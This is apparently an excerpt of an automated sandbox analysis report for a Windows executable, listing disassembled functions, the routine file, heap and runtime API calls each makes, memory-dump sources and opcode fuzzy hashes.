                                                                                        • Instruction ID: ecaabe679715f73942fb277e498379dd2febd26736637ee83140ec754053ba99
                                                                                        • Opcode Fuzzy Hash: ba6b89382cce1a9ecacd00a92e91135d67e0a0797bece91ee3bc4fcf4f330465
                                                                                        • Instruction Fuzzy Hash: 70A011CA2A8002BC322A22002E02C3B022CC0CAF20330E8AEF82A88880A8880C000832
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E541 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E51F
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: PDu<7
                                                                                        • API String ID: 1269201914-3110419215
                                                                                        • Opcode ID: 31bd0146457bcfd31a0a57d00152b07e708580c7f57fa8e2dadbebc4ac1d62d1
                                                                                        • Instruction ID: ecaabe679715f73942fb277e498379dd2febd26736637ee83140ec754053ba99
                                                                                        • Opcode Fuzzy Hash: 31bd0146457bcfd31a0a57d00152b07e708580c7f57fa8e2dadbebc4ac1d62d1
                                                                                        • Instruction Fuzzy Hash: 70A011CA2A8002BC322A22002E02C3B022CC0CAF20330E8AEF82A88880A8880C000832
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E5A2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E580
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: Fjun7
                                                                                        • API String ID: 1269201914-1894352427
                                                                                        • Opcode ID: 8ddbde0bbbf159f4e708b9d72b78f3cd680ce0283e87b57012b0ebcd4a49d2e9
                                                                                        • Instruction ID: 17738dec1d8511a9d8ee601dee3d3e967d3bd27756e27c93edd811a0480f4300
                                                                                        • Opcode Fuzzy Hash: 8ddbde0bbbf159f4e708b9d72b78f3cd680ce0283e87b57012b0ebcd4a49d2e9
                                                                                        • Instruction Fuzzy Hash: 67A012C11680017C311611501C02C37011CC0C9F20330D45DF42988480684408001431
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E58E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E580
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: Fjun7
                                                                                        • API String ID: 1269201914-1894352427
                                                                                        • Opcode ID: 62f364bf0b023927d1ae5047a87069ca68658f4473eb86fd85468a9b086f23f6
                                                                                        • Instruction ID: 17738dec1d8511a9d8ee601dee3d3e967d3bd27756e27c93edd811a0480f4300
                                                                                        • Opcode Fuzzy Hash: 62f364bf0b023927d1ae5047a87069ca68658f4473eb86fd85468a9b086f23f6
                                                                                        • Instruction Fuzzy Hash: 67A012C11680017C311611501C02C37011CC0C9F20330D45DF42988480684408001431
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0038BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0038B7BB: GetOEMCP.KERNEL32(00000000,?,?,0038BA44,?), ref: 0038B7E6
                                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0038BA89,?,00000000), ref: 0038BC64
                                                                                        • GetCPInfo.KERNEL32(00000000,0038BA89,?,?,?,0038BA89,?,00000000), ref: 0038BC77
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: CodeInfoPageValid
                                                                                        • String ID:
                                                                                        • API String ID: 546120528-0
                                                                                        • Opcode ID: 8e0bb639b9e058106b10f0878966c39f11c822bf941f0b50b7232e7e92b96a0a
                                                                                        • Instruction ID: 0a002bfd3d4ea2d7291f3ba06b4c941558e675aac1319710d703a1a22425d965
                                                                                        • Opcode Fuzzy Hash: 8e0bb639b9e058106b10f0878966c39f11c822bf941f0b50b7232e7e92b96a0a
                                                                                        • Instruction Fuzzy Hash: DE51F670900347AFDB22EF75C4916BAFBF9EF41300F1844EED4968B261D735954A8B90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00369A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00369A50,?,?,00000000,?,?,00368CBC,?), ref: 00369BAB
                                                                                        • GetLastError.KERNEL32(?,00000000,00368411,-00009570,00000000,000007F3), ref: 00369BB6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastPointer
                                                                                        • String ID:
                                                                                        • API String ID: 2976181284-0
                                                                                        • Opcode ID: 7c52843619c392dfdf2a0973dadc4ab7814f35fe63a71ebc9e93795fb748f1b9
                                                                                        • Instruction ID: 126a071177915debd15028941008d1556bac5878d3174289fe4601eb27c7aeb8
                                                                                        • Opcode Fuzzy Hash: 7c52843619c392dfdf2a0973dadc4ab7814f35fe63a71ebc9e93795fb748f1b9
                                                                                        • Instruction Fuzzy Hash: A341CE70604301CFDB26DF19E58466AB7EDFFD5320F16CA2FE88287268D770AD458A51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00361E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00361E55
                                                                                          • Part of subcall function 00363BBA: __EH_prolog.LIBCMT ref: 00363BBF
                                                                                        • _wcslen.LIBCMT ref: 00361EFD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog$_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 2838827086-0
                                                                                        • Opcode ID: ade9d9572d938e0d0b4daf0ded78e317cc74b4986516bdf0f0b3a4cff15ac1c3
                                                                                        • Instruction ID: 9d43d336f39d0efe37224e7290a5335d82f145f45a6f0ad566b9dbd4ad79defc
                                                                                        • Opcode Fuzzy Hash: ade9d9572d938e0d0b4daf0ded78e317cc74b4986516bdf0f0b3a4cff15ac1c3
                                                                                        • Instruction Fuzzy Hash: C1313C72904209AFCF16DF99C945AEEFBF5AF48300F1480A9F445AB255CB769E10CB60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00369DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,003673BC,?,?,?,00000000), ref: 00369DBC
                                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00369E70
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$BuffersFlushTime
                                                                                        • String ID:
                                                                                        • API String ID: 1392018926-0
                                                                                        • Opcode ID: 6833062aaa42011597bb5d25998007acab733dcce4b6ffa096db9037c936dbf2
                                                                                        • Instruction ID: 50439e6014e83e71acc1d5924708aa5ce6a2c666660cc147270f76b3965991d7
                                                                                        • Opcode Fuzzy Hash: 6833062aaa42011597bb5d25998007acab733dcce4b6ffa096db9037c936dbf2
                                                                                        • Instruction Fuzzy Hash: C721EE32248286EBC716CF34C891BABBBECAF55704F09882EF4C587145D339E90D9B61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00369F27,?,?,0036771A), ref: 003696E6
                                                                                        • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00369F27,?,?,0036771A), ref: 00369716
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: 34a4e5e4469007fb07b93f9e6cb4d24dcd67505fa0f8378cdc2bc7c9e07a5191
                                                                                        • Instruction ID: e1ab8092a249de20605acb152e591d4e1210c9e83d6567dbe7e9b766a91541b6
                                                                                        • Opcode Fuzzy Hash: 34a4e5e4469007fb07b93f9e6cb4d24dcd67505fa0f8378cdc2bc7c9e07a5191
                                                                                        • Instruction Fuzzy Hash: 1321F1B1004344AFE3318A64CC89FB7B7DCEB49330F018A1AF9D6C65D9C378A8848631
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00369E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00369EC7
                                                                                        • GetLastError.KERNEL32 ref: 00369ED4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastPointer
                                                                                        • String ID:
                                                                                        • API String ID: 2976181284-0
                                                                                        • Opcode ID: 6e0d849302269b809566dcd92cc860d7450bc9835fbae1c07c42aa3fc6af73a6
                                                                                        • Instruction ID: df34ecde0fdec894e8efa185474b89f9bebc30df9a23f06754ce867b50581efa
                                                                                        • Opcode Fuzzy Hash: 6e0d849302269b809566dcd92cc860d7450bc9835fbae1c07c42aa3fc6af73a6
                                                                                        • Instruction Fuzzy Hash: 1911E530600700ABD726C628C841BA6B7ECAB45370F518A2BE153D2AD8D7B2ED45C760
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00388E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00388E75
                                                                                          • Part of subcall function 00388E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00384286,?,0000015D,?,?,?,?,00385762,000000FF,00000000,?,?), ref: 00388E38
                                                                                        • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,003A1098,003617CE,?,?,00000007,?,?,?,003613D6,?,00000000), ref: 00388EB1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocAllocate_free
                                                                                        • String ID:
                                                                                        • API String ID: 2447670028-0
                                                                                        • Opcode ID: 8d9621c950110d9e95b91ec1ac85bb3bd15cd1d805cf6d64715c191dd6e8d77d
                                                                                        • Instruction ID: db6892e9ec948ed41a0326fafa89314906803a39df8e25cd371d3f0ff7fd8f26
                                                                                        • Opcode Fuzzy Hash: 8d9621c950110d9e95b91ec1ac85bb3bd15cd1d805cf6d64715c191dd6e8d77d
                                                                                        • Instruction Fuzzy Hash: 95F0C23220530666CB237B25AC05B6F376C8F81B70FA605A6F854AA191DF60FD0183A0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(?,?), ref: 003710AB
                                                                                        • GetProcessAffinityMask.KERNEL32(00000000), ref: 003710B2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$AffinityCurrentMask
                                                                                        • String ID:
                                                                                        • API String ID: 1231390398-0
                                                                                        • Opcode ID: 11740574bbdd6c68b4c6b0ad138c097f029f7ff2b7bd526f65affe1f93649cd6
                                                                                        • Instruction ID: 54fa056a10ed014a24d07a9296ec7477e1819e381f1bf1130151a0e63c09b299
                                                                                        • Opcode Fuzzy Hash: 11740574bbdd6c68b4c6b0ad138c097f029f7ff2b7bd526f65affe1f93649cd6
                                                                                        • Instruction Fuzzy Hash: D1E0D873B10145ABCF2B8BB89C058EB73DDEA44304711C176E407E3201F938DE414A60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0036A325,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A501
                                                                                          • Part of subcall function 0036BB03: _wcslen.LIBCMT ref: 0036BB27
                                                                                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0036A325,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A532
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile$_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 2673547680-0
                                                                                        • Opcode ID: 7cecca90e9b691cf6fc8e46ad234b5c5559c0f2733eb64bedb8eb3eae4db9a19
                                                                                        • Instruction ID: d5e09dad74827950b216c6d2e9bf3bccdfca6a3d37ec770925d798e2c15d8c76
                                                                                        • Opcode Fuzzy Hash: 7cecca90e9b691cf6fc8e46ad234b5c5559c0f2733eb64bedb8eb3eae4db9a19
                                                                                        • Instruction Fuzzy Hash: 9EF030712401097BDF135F61DC45FDA37ACAF04385F448051B94AE6164EB71DED4DE50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DeleteFileW.KERNELBASE(000000FF,?,?,0036977F,?,?,003695CF,?,?,?,?,?,00392641,000000FF), ref: 0036A1F1
                                                                                          • Part of subcall function 0036BB03: _wcslen.LIBCMT ref: 0036BB27
                                                                                        • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0036977F,?,?,003695CF,?,?,?,?,?,00392641), ref: 0036A21F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: DeleteFile$_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 2643169976-0
                                                                                        • Opcode ID: 2fe3c5508ba04ddcc95f5b6088597c36bbac2c2dbb95239a0df24bfad915a190
                                                                                        • Instruction ID: fac5d4660ef89e7df104a4095e38f43b4169d07214e9aeb011f0e2c9b230aedd
                                                                                        • Opcode Fuzzy Hash: 2fe3c5508ba04ddcc95f5b6088597c36bbac2c2dbb95239a0df24bfad915a190
                                                                                        • Instruction Fuzzy Hash: 2CE0D8751442096BEB135F60DC46FD9375CAF0C3C5F488061B945E6154EB72DEC4DE54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037AC7C Relevance: 3.0, APIs: 2, Instructions: 26comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GdiplusShutdown.GDIPLUS(?,?,?,?,00392641,000000FF), ref: 0037ACB0
                                                                                        • OleUninitialize.OLE32(?,?,?,?,00392641,000000FF), ref: 0037ACB5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: GdiplusShutdownUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 3856339756-0
                                                                                        • Opcode ID: bc54b56a65aef8494da8c956cd9fface9105ad9632f5fa74b19ba6cf7399c84b
                                                                                        • Instruction ID: aaf3d130665de9b4ee1eb02249789242728b87c8df72d9ccb7966cd747131214
